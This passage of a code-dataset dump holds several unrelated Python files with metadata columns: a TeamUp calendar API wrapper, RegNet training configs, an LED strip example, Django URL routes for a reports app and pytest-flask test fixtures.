elif returnas == 'dataframe' and 'pandas' in sys.modules:
return pd.DataFrame.from_records(events_json), timestamp
else:
return events_json, timestamp
def new_event(self, title, start_dt, end_dt, subcalendar_ids, all_day=False,
notes=None, location=None, who=None, remote_id=None, returnas='event'):
"""
Create a new event within a provided subcalendar. Can return as Event object, Series object, or Dictionary.
Undo_id not included with return unless returnas='event' in which case it is included with the returned Event Object
:param subcalendar_id: <str, int, or list-like> Required - the ID of the subcalendar within the calendar the event should be created in.
:param title: <str> Title of the event, must be
:param start_dt: <datetime> Start Datetime
:param end_dt: <datetime> End Datetime
:param all_day: <Bool> Allday or Not
:param notes: <str> HTML or Markdown formatted string detailing the Description
:param location: <str> Location of the event
:param who: <str>
:param remote_id: <str> Remote ID of the event, used to link the TeamUp event record to its source information
:param returnas: <str> `event` `series` `dict` are valid options
:return:
"""
if returnas not in ('event','dict','series'):
raise ValueError(f'Unrecognized returnas parameter: {returnas}')
if not isinstance(start_dt, datetime.datetime) or not isinstance(end_dt, datetime.datetime):
try:
start_dt = to_datetime(start_dt)
end_dt = to_datetime(end_dt)
except:
raise ValueError('Parse failed, please pass all dates as a datetime object')
if isinstance(subcalendar_ids, (str, int)):
subcalendar_ids = [subcalendar_ids]
if not isinstance(subcalendar_ids, (tuple, list)):
raise ValueError(f'Unrecognized Type: Subcalendar_ids type: {type(subcalendar_ids)}')
payload = {'remote_id': remote_id,
'title': title,
'subcalendar_ids': subcalendar_ids,
'start_dt': format_date(start_dt),
'end_dt': format_date(end_dt),
'all_day': all_day,
'notes': notes,
'location': location,
'who': who
}
resp_text = self._create_event_from_json(json.dumps(payload))
resp_dict = json.loads(resp_text)
event_dict = resp_dict['event']
undo_id = resp_dict['undo_id']
if returnas == 'event':
return Event(self, undo_id = undo_id, **event_dict)
elif returnas == 'series' and 'pandas' in sys.modules:
return pd.Series(event_dict)
else:
return event_dict
| import requests
import json
import datetime
import sys
from dateutil.parser import parse as to_datetime
try:
import pandas as pd
except ImportError:
pass
from pyteamup.utils.utilities import *
from pyteamup.utils.constants import *
from pyteamup.Event import Event
class Calendar:
def __init__(self, cal_id, api_key):
self.__calendar_id = cal_id
self.__api_key = api_key
self.__cal_base = f'/{cal_id}'
self.__token_str = f'?_teamup_token={self.api_key}'
self.__subcalendars = None
self.__valid_api = None
self.__configuration = None
self._base_url = BASE_URL + self.__cal_base
self._event_collection_url = self._base_url + EVENTS_BASE + self.__token_str
self._subcalendars_url = self._base_url + SUBCALENDARS_BASE + self.__token_str
self._check_access_url = BASE_URL + CHECK_ACCESS_BASE + self.__token_str
self.events_json = None
if not self.valid_api:
raise Exception(f'Invalid Api Key: {self.api_key}')
def __str__(self):
return self.calendar_id
@property
def api_key(self):
return self.__api_key
@property
def calendar_id(self):
return self.__calendar_id
@property
def valid_api(self):
"""Makes a request to the calendar to see if the api is valid"""
if not self.__valid_api:
req = requests.get(self._check_access_url)
try:
check_status_code(req.status_code)
self.__valid_api = True
except:
self.__valid_api = False
return self.__valid_api
else:
return None
@property
def configuration(self):
if self.__configuration is None:
print('Fetching configuration')
req = requests.get(self._base_url + CONFIGURATION_BASE + self.__token_str)
check_status_code(req.status_code)
self.__configuration = json.loads(req.text)['configuration']
return self.__configuration
@property
def subcalendars(self):
if not self.__subcalendars:
print('Fetching Subcalendars')
req = requests.get(self._subcalendars_url)
check_status_code(req.status_code)
self.__subcalendars = json.loads(req.text)['subcalendars']
return self.__subcalendars
def clear_calendar_cache(self):
self.__subcalendars = None
self.__configuration = None
def get_event_collection(self, start_dt=None, end_dt=None, subcal_id=None, returnas='events', markdown=False):
"""
Method allows bulk fetching of events that fall between the provided time frame. If None is provided then
the current date -30 and +180 days is used.
:param start_dt: if set as None then set as today minus 30 days
:param end_dt: if left as None then set as today plus 180 days
:param subcal_id: optional str or list-like if a different calendar should be queried
:return: json of events
"""
if returnas not in ('events', 'dataframe', 'dict'):
raise TypeError('Returnas not recognized. Recognized values: events, dataframe, dict')
if start_dt is None:
start_dt = datetime.date.today() - datetime.timedelta(30)
if end_dt is None:
end_dt = datetime.date.today() + datetime.timedelta(180)
subcal_par = ''
if subcal_id:
if isinstance(subcal_id, (list, tuple)):
for id in subcal_id:
subcal_par += f'&subcalendarId[]={id}'
else:
subcal_par = f'&subcalendarId[]={subcal_id}'
if markdown:
para_markdown = '&format[]=markdown'
else:
para_markdown = ''
parameters = f'&startDate={start_dt.strftime("%Y-%m-%d")}&endDate={end_dt.strftime("%Y-%m-%d")}' + subcal_par + para_markdown
req = requests.get(self._event_collection_url + parameters)
check_status_code(req.status_code)
self.events_json = json.loads(req.text)['events']
if returnas == 'events':
return [Event(self, **event_dict) for event_dict in self.events_json]
elif returnas == 'dataframe' and 'pandas' in sys.modules:
return pd.DataFrame.from_records(self.events_json)
else:
return self.events_json
def _create_event_from_json(self, payload):
""" Lazy Creation of Event by passing a formatted payload"""
resp = requests.post(self._event_collection_url, data=payload, headers=POST_HEADERS)
try:
check_status_code(resp.status_code)
except:
print(payload)
print(resp.text)
raise
return resp.text
def get_event(self, event_id, returnas='event'):
if returnas not in ('event', 'series', 'dict'):
raise TypeError('Returnas not recognized. Recognized values: event, series, dict')
url = self._base_url + EVENTS_BASE + f'/{event_id}' + self.__token_str
resp = requests.get(url)
check_status_code(resp.status_code)
event_dict = json.loads(resp.text)['event']
if returnas == 'event':
return Event(self, **event_dict)
elif returnas == 'series' and 'pandas' in sys.modules:
return pd.Series(event_dict)
else:
return event_dict
def get_subcalendar(self):
raise NotImplementedError
def search_events(self):
raise NotImplementedError
def get_changed_events(self, modified_since, returnas='events'):
"""
Get changed events since given unix time
:param modified_since: <int> Unix timestamp, must be less than 30 days old
:param returnas: <str> `events` `dataframe` `dict` are valid options
:return: Tuple of event list and returned timestamp
"""
if returnas not in ('events', 'dataframe', 'dict'):
raise TypeError('Returnas not recognized. Recognized values: events, dataframe, dict')
url = self._base_url + EVENTS_BASE + self.__token_str + '&modifiedSince=' + str(modified_since)
resp = requests.get(url)
check_status_code(resp.status_code)
events_json = json.loads(resp.text)['events']
timestamp = json.loads(resp.text)['timestamp']
if returnas == 'events':
return [Event(self, **event_dict) for event_dict in events_json], timestamp
elif returnas == 'dataframe' and 'pandas' in sys.modules:
return pd.DataFrame.from_records(events_json), timestamp
else:
return events_json, timestamp
def new_event(self, title, start_dt, end_dt, subcalendar_ids, all_day=False,
notes=None, location=None, who=None, remote_id=None, returnas='event'):
"""
Create a new event within a provided subcalendar. Can return as Event object, Series object, or Dictionary.
Undo_id not included with return unless returnas='event' in which case it is included with the returned Event Object
:param subcalendar_id: <str, int, or list-like> Required - the ID of the subcalendar within the calendar the event should be created in.
:param title: <str> Title of the event, must be
:param start_dt: <datetime> Start Datetime
:param end_dt: <datetime> End Datetime
:param all_day: <Bool> Allday or Not
:param notes: <str> HTML or Markdown formatted string detailing the Description
:param location: <str> Location of the event
:param who: <str>
:param remote_id: <str> Remote ID of the event, used to link the TeamUp event record to its source information
:param returnas: <str> `event` `series` `dict` are valid options
:return:
"""
if returnas not in ('event','dict','series'):
raise ValueError(f'Unrecognized returnas parameter: {returnas}')
if not isinstance(start_dt, datetime.datetime) or not isinstance(end_dt, datetime.datetime):
try:
start_dt = to_datetime(start_dt)
end_dt = to_datetime(end_dt)
except:
raise ValueError('Parse failed, please pass all dates as a datetime object')
if isinstance(subcalendar_ids, (str, int)):
subcalendar_ids = [subcalendar_ids]
if not isinstance(subcalendar_ids, (tuple, list)):
raise ValueError(f'Unrecognized Type: Subcalendar_ids type: {type(subcalendar_ids)}')
payload = {'remote_id': remote_id,
'title': title,
'subcalendar_ids': subcalendar_ids,
'start_dt': format_date(start_dt),
'end_dt': format_date(end_dt),
'all_day': all_day,
'notes': notes,
'location': location,
'who': who
}
resp_text = self._create_event_from_json(json.dumps(payload))
resp_dict = json.loads(resp_text)
event_dict = resp_dict['event']
undo_id = resp_dict['undo_id']
if returnas == 'event':
return Event(self, undo_id = undo_id, **event_dict)
elif returnas == 'series' and 'pandas' in sys.modules:
return pd.Series(event_dict)
else:
return event_dict
| en | 0.769907 | Makes a request to the calendar to see if the api is valid Method allows bulk fetching of events that fall between the provided time frame. If None is provided then the current date -30 and +180 days is used. :param start_dt: if set as None then set as today minus 30 days :param end_dt: if left as None then set as today plus 180 days :param subcal_id: optional str or list-like if a different calendar should be queried :return: json of events Lazy Creation of Event by passing a formatted payload Get changed events since given unix time :param modified_since: <int> Unix timestamp, must be less than 30 days old :param returnas: <str> `event` `series` `dict` are valid options :return: Tuple of event list and returned timestamp Create a new event within a provided subcalendar. Can return as Event object, Series object, or Dictionary. Undo_id not included with return unless returnas='event' in which case it is included with the returned Event Object :param subcalendar_id: <str, int, or list-like> Required - the ID of the subcalendar within the calendar the event should be created in. :param title: <str> Title of the event, must be :param start_dt: <datetime> Start Datetime :param end_dt: <datetime> End Datetime :param all_day: <Bool> Allday or Not :param notes: <str> HTML or Markdown formatted string detailing the Description :param location: <str> Location of the event :param who: <str> :param remote_id: <str> Remote ID of the event, used to link the TeamUp event record to its source information :param returnas: <str> `event` `series` `dict` are valid options :return: | 2.620274 | 3 |
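A short usage sketch for the Calendar class above. The calendar key, API token, and subcalendar id are placeholders, and the top-level import path is assumed from the package layout; everything else follows the method signatures shown.

import datetime

from pyteamup import Calendar  # import path assumed from the package layout

cal = Calendar('ksxxxxxxxxxxxxxxxx', 'my_api_key')  # placeholder credentials

# Fetch Event objects for the next two weeks on one subcalendar
events = cal.get_event_collection(
    start_dt=datetime.datetime.now(),
    end_dt=datetime.datetime.now() + datetime.timedelta(days=14),
    subcal_id=12345,
)
for event in events:
    print(event)

# Create an event; returns an Event object by default
meeting = cal.new_event(
    'Team sync',
    start_dt=datetime.datetime(2021, 6, 1, 10, 0),
    end_dt=datetime.datetime(2021, 6, 1, 11, 0),
    subcalendar_ids=12345,
)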
configs/regnet.py | roatienza/agmax | 2 | 10386 |
from . import constant
parameters = {
'RegNet' : { "lr": 0.1, "epochs": 100, "weight_decay": 5e-5, "batch_size": 128, "nesterov": True, "init_backbone":True, "init_extractor":True,},
}
backbone_config = {
"RegNetX002" : {"channels": 3, "dropout": 0.2,},
"RegNetY004" : {"channels": 3, "dropout": 0.2,},
}
train = {
# RegNetX002
'RegNetX002-standard': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": False, "mixup" : False,
},
'RegNetX002-cutmix': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetX002-standard-agmax': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": False, "mixup" : False,
},
'RegNetX002-auto_augment-cutmix-agmax': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetX002-auto_augment-mixup-agmax': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": False, "mixup" : True,
},
'RegNetX002-auto_augment-cutmix': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetX002-auto_augment-mixup': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": False, "mixup" : True,
},
# RegNetY004
'RegNetY004-standard': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": False, "mixup" : False,
},
'RegNetY004-cutmix': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetY004-standard-agmax': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": False, "mixup" : False,
},
'RegNetY004-auto_augment-cutmix-agmax': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetY004-auto_augment-mixup-agmax': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": False, "mixup" : True,
},
'RegNetY004-auto_augment-cutmix': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetY004-auto_augment-mixup': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": False, "mixup" : True,
},
}
|
from . import constant
parameters = {
'RegNet' : { "lr": 0.1, "epochs": 100, "weight_decay": 5e-5, "batch_size": 128, "nesterov": True, "init_backbone":True, "init_extractor":True,},
}
backbone_config = {
"RegNetX002" : {"channels": 3, "dropout": 0.2,},
"RegNetY004" : {"channels": 3, "dropout": 0.2,},
}
train = {
# RegNetX002
'RegNetX002-standard': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": False, "mixup" : False,
},
'RegNetX002-cutmix': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetX002-standard-agmax': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": False, "mixup" : False,
},
'RegNetX002-auto_augment-cutmix-agmax': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetX002-auto_augment-mixup-agmax': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": False, "mixup" : True,
},
'RegNetX002-auto_augment-cutmix': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetX002-auto_augment-mixup': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": False, "mixup" : True,
},
# RegNetY004
'RegNetY004-standard': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": False, "mixup" : False,
},
'RegNetY004-cutmix': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetY004-standard-agmax': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": False, "mixup" : False,
},
'RegNetY004-auto_augment-cutmix-agmax': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetY004-auto_augment-mixup-agmax': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": False, "mixup" : True,
},
'RegNetY004-auto_augment-cutmix': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetY004-auto_augment-mixup': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": False, "mixup" : True,
},
}
| en | 0.534218 | # RegNetX002 # RegNetY004 | 1.667898 | 2 |
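The dictionaries above are plain lookup tables keyed by experiment name; a training driver would select an entry and unpack its hyperparameters. A minimal sketch of that lookup, assuming the module sits in a configs package as the relative import suggests:

from configs import regnet

config = regnet.train['RegNetX002-auto_augment-cutmix-agmax']
params = config['parameters']

print(config['backbone'])                 # RegNetX002
print(params['lr'], params['epochs'])     # 0.1 100
print(config['agmax'], config['cutmix'])  # True True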
examples/ws2812/main.py | ivankravets/pumbaa | 69 | 10387 | <filename>examples/ws2812/main.py
#
# @section License
#
# The MIT License (MIT)
#
# Copyright (c) 2016-2017, <NAME>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use, copy,
# modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# This file is part of the Pumbaa project.
#
import board
from drivers import Ws2812
import time
PIXEL_MAX = 81
RED = PIXEL_MAX * b'\x00\xff\x00'
GREEN = PIXEL_MAX * b'\xff\x00\x00'
BLUE = PIXEL_MAX * b'\x00\x00\xff'
WS2812 = Ws2812(board.PIN_GPIO18)
while True:
print('Red.')
WS2812.write(RED)
time.sleep(0.5)
print('Green.')
WS2812.write(GREEN)
time.sleep(0.5)
print('Blue.')
WS2812.write(BLUE)
time.sleep(0.5)
| <filename>examples/ws2812/main.py
#
# @section License
#
# The MIT License (MIT)
#
# Copyright (c) 2016-2017, <NAME>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use, copy,
# modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# This file is part of the Pumbaa project.
#
import board
from drivers import Ws2812
import time
PIXEL_MAX = 81
RED = PIXEL_MAX * b'\x00\xff\x00'
GREEN = PIXEL_MAX * b'\xff\x00\x00'
BLUE = PIXEL_MAX * b'\x00\x00\xff'
WS2812 = Ws2812(board.PIN_GPIO18)
while True:
print('Red.')
WS2812.write(RED)
time.sleep(0.5)
print('Green.')
WS2812.write(GREEN)
time.sleep(0.5)
print('Blue.')
WS2812.write(BLUE)
time.sleep(0.5)
| en | 0.778273 | # # @section License # # The MIT License (MIT) # # Copyright (c) 2016-2017, <NAME> # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation # files (the "Software"), to deal in the Software without # restriction, including without limitation the rights to use, copy, # modify, merge, publish, distribute, sublicense, and/or sell copies # of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # # This file is part of the Pumbaa project. # | 2.348122 | 2 |
reports/urls.py | aysiu/manana | 9 | 10388 | from django.conf.urls import patterns, include, url
urlpatterns = patterns('reports.views',
url(r'^index/*$', 'index'),
url(r'^dashboard/*$', 'dashboard'),
url(r'^$', 'index'),
url(r'^detail/(?P<serial>[^/]+)$', 'detail'),
url(r'^detailpkg/(?P<serial>[^/]+)/(?P<manifest_name>[^/]+)$', 'detail_pkg'),
url(r'^detailmachine/(?P<serial>[^/]+)$', 'machine_detail'),
url(r'^appleupdate/(?P<serial>[^/]+)$', 'appleupdate'),
url(r'^raw/(?P<serial>[^/]+)$', 'raw'),
url(r'^submit/(?P<submission_type>[^/]+)$', 'submit'),
url(r'^warranty/(?P<serial>[^/]+)$', 'warranty'),
# for compatibility with MunkiReport scripts
url(r'^ip$', 'lookup_ip'),
url(r'^(?P<submission_type>[^/]+)$', 'submit'),
) | from django.conf.urls import patterns, include, url
urlpatterns = patterns('reports.views',
url(r'^index/*$', 'index'),
url(r'^dashboard/*$', 'dashboard'),
url(r'^$', 'index'),
url(r'^detail/(?P<serial>[^/]+)$', 'detail'),
url(r'^detailpkg/(?P<serial>[^/]+)/(?P<manifest_name>[^/]+)$', 'detail_pkg'),
url(r'^detailmachine/(?P<serial>[^/]+)$', 'machine_detail'),
url(r'^appleupdate/(?P<serial>[^/]+)$', 'appleupdate'),
url(r'^raw/(?P<serial>[^/]+)$', 'raw'),
url(r'^submit/(?P<submission_type>[^/]+)$', 'submit'),
url(r'^warranty/(?P<serial>[^/]+)$', 'warranty'),
# for compatibilty with MunkiReport scripts
url(r'^ip$', 'lookup_ip'),
url(r'^(?P<submission_type>[^/]+)$', 'submit'),
) | en | 0.75041 | # for compatibility with MunkiReport scripts | 2.00458 | 2 |
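Each named capture group above is passed to the matching view as a keyword argument. A hypothetical sketch of one handler signature in reports/views.py; the body is illustrative only:

# reports/views.py (sketch)
from django.http import HttpResponse

def detail(request, serial):
    # `serial` receives the value captured by (?P<serial>[^/]+) in urls.py
    return HttpResponse('Detail for machine %s' % serial)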
BackEnd/venv/lib/python3.8/site-packages/pytest_flask/fixtures.py | MatheusBrodt/App_LabCarolVS | 0 | 10389 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import multiprocessing
import pytest
import socket
import signal
import os
import logging
try:
from urllib2 import URLError, urlopen
except ImportError:
from urllib.error import URLError
from urllib.request import urlopen
from flask import _request_ctx_stack
@pytest.yield_fixture
def client(app):
"""A Flask test client. An instance of :class:`flask.testing.TestClient`
by default.
"""
with app.test_client() as client:
yield client
@pytest.fixture
def client_class(request, client):
"""Uses to set a ``client`` class attribute to current Flask test client::
@pytest.mark.usefixtures('client_class')
class TestView:
def login(self, email, password):
credentials = {'email': email, 'password': password}
return self.client.post(url_for('login'), data=credentials)
def test_login(self):
assert self.login('<EMAIL>', 'pass').status_code == 200
"""
if request.cls is not None:
request.cls.client = client
class LiveServer(object):
"""The helper class uses to manage live server. Handles creation and
stopping application in a separate process.
:param app: The application to run.
:param host: The host where to listen (default localhost).
:param port: The port to run application.
"""
def __init__(self, app, host, port, clean_stop=False):
self.app = app
self.port = port
self.host = host
self.clean_stop = clean_stop
self._process = None
def start(self):
"""Start application in a separate process."""
def worker(app, host, port):
app.run(host=host, port=port, use_reloader=False, threaded=True)
self._process = multiprocessing.Process(
target=worker,
args=(self.app, self.host, self.port)
)
self._process.start()
# We must wait for the server to start listening with a maximum
# timeout of 5 seconds.
timeout = 5
while timeout > 0:
time.sleep(1)
try:
urlopen(self.url())
timeout = 0
except URLError:
timeout -= 1
def url(self, url=''):
"""Returns the complete url based on server options."""
return 'http://%s:%d%s' % (self.host, self.port, url)
def stop(self):
"""Stop application process."""
if self._process:
if self.clean_stop and self._stop_cleanly():
return
if self._process.is_alive():
# If it's still alive, kill it
self._process.terminate()
def _stop_cleanly(self, timeout=5):
"""Attempts to stop the server cleanly by sending a SIGINT signal and waiting for
``timeout`` seconds.
:return: True if the server was cleanly stopped, False otherwise.
"""
try:
os.kill(self._process.pid, signal.SIGINT)
self._process.join(timeout)
return True
except Exception as ex:
logging.error('Failed to join the live server process: %r', ex)
return False
def __repr__(self):
return '<LiveServer listening at %s>' % self.url()
def _rewrite_server_name(server_name, new_port):
"""Rewrite server port in ``server_name`` with ``new_port`` value."""
sep = ':'
if sep in server_name:
server_name, port = server_name.split(sep, 1)
return sep.join((server_name, new_port))
@pytest.fixture(scope='function')
def live_server(request, app, monkeypatch, pytestconfig):
"""Run application in a separate process.
When the ``live_server`` fixture is applied, the ``url_for`` function
works as expected::
def test_server_is_up_and_running(live_server):
index_url = url_for('index', _external=True)
assert index_url == 'http://localhost:5000/'
res = urllib2.urlopen(index_url)
assert res.code == 200
"""
port = pytestconfig.getvalue('live_server_port')
if port == 0:
# Bind to an open port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 0))
port = s.getsockname()[1]
s.close()
host = pytestconfig.getvalue('live_server_host')
# Explicitly set application ``SERVER_NAME`` for test suite
# and restore original value on test teardown.
server_name = app.config['SERVER_NAME'] or 'localhost'
monkeypatch.setitem(app.config, 'SERVER_NAME',
_rewrite_server_name(server_name, str(port)))
clean_stop = request.config.getvalue('live_server_clean_stop')
server = LiveServer(app, host, port, clean_stop)
if request.config.getvalue('start_live_server'):
server.start()
request.addfinalizer(server.stop)
return server
@pytest.fixture
def config(app):
"""An application config."""
return app.config
@pytest.fixture
def request_ctx(app):
"""The request context which contains all request relevant information,
e.g. `session`, `g`, `flashes`, etc.
"""
return _request_ctx_stack.top
@pytest.fixture(params=['application/json', 'text/html'])
def mimetype(request):
return request.param
def _make_accept_header(mimetype):
return [('Accept', mimetype)]
@pytest.fixture
def accept_mimetype(mimetype):
return _make_accept_header(mimetype)
@pytest.fixture
def accept_json(request):
return _make_accept_header('application/json')
@pytest.fixture
def accept_jsonp():
return _make_accept_header('application/json-p')
@pytest.fixture(params=['*', '*/*'])
def accept_any(request):
return _make_accept_header(request.param)
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import multiprocessing
import pytest
import socket
import signal
import os
import logging
try:
from urllib2 import URLError, urlopen
except ImportError:
